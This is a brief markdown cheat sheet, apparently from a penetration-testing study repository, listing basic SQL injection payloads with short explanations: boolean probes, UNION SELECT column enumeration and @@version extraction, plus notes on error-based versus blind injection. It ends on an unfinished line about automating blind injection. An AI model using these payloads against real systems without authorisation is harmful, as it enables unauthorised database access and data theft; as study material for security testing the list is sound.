nairuzabulhul/R3d-Buck3T/PTP/Web_Security/SQL_CheatSheet.md

 - ' and substring(@@version,1,1)='5   &nbsp; |  &nbsp; find the version of the db

+if you get a error means that SQL vulnerability is error based, if not means blind SQl.

+For Blind SQL, we need to focus on the behavior of the application and try different queries :

+>>> ' and 'a'='a    |  if data displayed mean that there is SQL vulnerability

+>>> ' UNION SELECT null;-- - |  this command is used to enumerate the database in order to know the number of columns it has

+>>>  ' UNION SELECT "else1";-- - | test the query with string,or intger to see the type of data in the columns

+>>>> 99999 ' UNION SELECT null;-- - |  to display our entered data on the fields

+>>>  99999 UNION SELECT @@version;| @@version is to know the version of the db

+>>>

 Automate the process of SQL blind
 >> script